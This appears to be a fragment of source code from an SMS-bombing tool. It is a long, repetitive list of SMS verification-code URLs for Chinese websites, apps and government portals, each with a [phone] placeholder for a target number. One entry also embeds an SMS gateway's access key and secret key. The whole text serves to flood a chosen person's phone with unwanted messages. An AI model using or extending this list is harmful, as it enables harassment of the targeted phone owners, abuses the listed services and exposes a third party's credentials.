"https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", + "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", + "https://couple-api.jizhangapp.com/login/captcha/[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", + "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", + "http://www.1314.buzz/index.php?hm=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://user.daojia.com:80/mobile/getcode?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://ptlogin.4399.com:443/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.zhiguker.com/index/user/regYzm?phone=[phone]", + "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]&ccode=&id=PUT60101350&sid=72a49eb9c9b94b2692a44daa50e2011c&cid=72a49eb9c9b94b2692a44daa50e2011c&lng=cn&p=http%3A//www.lxcpa.net/&e=&un=&ud=&on=&d=1589617104719", + "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", + "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://cfapi.yaomengwang.cn/local/v1/account/regist/sms?mobile=[phone]", + "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", + "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", + "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO%2B6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC%2B%2FCA&phone=[phone]", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://www.shencut.com/api/v1.0/code?operate_type=register&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]&sign=d012c7dbfeba6014a28b9093156cd52d&ts=1565428712975901&type=1", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.metromall.cn/user/MobileCode.aspx?randnum=&Phone=[phone]", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", + "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", + "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", + "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "https://wapi.jfh6688.cn/sendRegisterCode?type=1&login=[phone]", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.hx2car.com/mobile/loginCode.json?code=d889c6084be2613b8ed976d2336bc53a&devicetoken=0FAEEA4E-B279-4409-93A6-05B4EDE49DE8&phoNum=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi 4A&osLevel=23&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", + "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", + "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw==&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA+uIMWLFLQzyVfRCP1db+11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", + "https://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&uid&code&dfpToken=THrLck1681e2c9a89rGPm639e&detect=mmds_uDjz1jfWoxDDcojxxwoDwgWozujMf1xjggnjkZJwujuDMonJNNojJfZogzMxoxMnW1NDJZjwukndT5UBJ5qL55XxZeNvx5fxAC4055SwwTkl555-xjC-555KxOC.", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://photograph.yuanlikj.cn/send/Send?appName=%E6%88%AA%E5%9B%BE%E7%A7%80-%E5%AF%B9%E8%AF%9D%E7%94%9F%E6%88%90%E5%99%A8&TELMobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", + "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", + 